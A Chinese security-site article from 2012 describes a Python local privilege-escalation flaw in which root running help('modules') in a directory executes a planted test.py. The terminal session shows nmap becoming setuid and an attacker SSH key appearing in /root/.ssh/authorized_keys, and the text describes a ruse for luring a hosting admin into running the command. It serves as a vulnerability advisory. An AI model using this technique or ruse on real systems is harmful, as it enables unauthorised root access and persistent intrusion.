首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
最新python提权:python-wrapper及python 不可信的搜索路径/代码执行漏洞
来源:http://www.freebuf.com 作者:cs24 发布时间:2012-07-20  

exploit-db.com近日爆了一个奇特的漏洞。只要诱使root在当前目录,通过python或者python-wrapper执行一下help(‘modules’)命令,后台就以root权限执行该目录下test.py脚本。
///adalia是普通用户,以下显示test.py的权限和脚本内容。脚本内容其中一项是chmod 4755 /usr/bin/nmap,把nmap加为4755权限,这意味着以执行nmap时以nmap的owner权限执行,即普通用户可以用root权限执行nmap

///以下所示nmap本来的权限为rwx
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.4M Oct 29  2011 /usr/bin/nmap
///攻击前 /root/.ssh/authorized_keys不存在
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory

///攻击开始:以bukkit(root权限)执行python

adalia@bukkit:~/security/pythonwrapper> su
Password:
bukkit:/home/adalia/security/pythonwrapper # python
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')
Please wait a moment while I gather a list of all available modules...
...此处省略具体模块...
>>> exit() 

///经过一番modules的列举后在看看情况nmap的权限已经变成rws了。也即可以以nmap的owen权限执行。而原本不存在的/root/.ssh/authorized_keys的文件也有了。

bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.4M Oct 29  2011 /usr/bin/nmap
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
ssh-rsa rogueclown washere

漏洞发现者还提供了一种诱使管理员运行 help(‘modules’)的场景,在webhosting环境下,向管理员反应某些模块运行有问题,要求管理帮忙调试一把,列出webhosting环境里安装了那些模块。于是管理员等到该用户目录下,一跑起 help(‘modules’)就悲剧了。
受影响:
Version: python 2.7.2 and python 3.2.1
Python untrusted search path/code execution vulnerability:
http://www.exploit-id.com/local-exploits/python-untrusted-search-pathcode-execution-vulnerability
python-wrapper untrusted search path/code execution vulnerability:
http://www.exploit-db.com/exploits/19523/


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·SAE云服务安全沙箱绕过
·phpcms 2008多个漏洞 (可getshel
·Discuz7.X通杀0day(UCenter Home
·phpcms v9注入漏洞
·SAE云服务安全沙箱绕过2(利用cra
·Velocity Parse()函数引发的本地
·织梦cms v6.7最新上传漏洞
·SHOPEX 4.8.5 注入漏洞以及后台
·SAE云服务安全沙箱绕过3(绕过命
·SAE云服务安全沙箱绕过4(绕过文
·structs2 远程命令执行漏洞分析
·XSS蠕虫与QQ系统消息推送双剑合
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved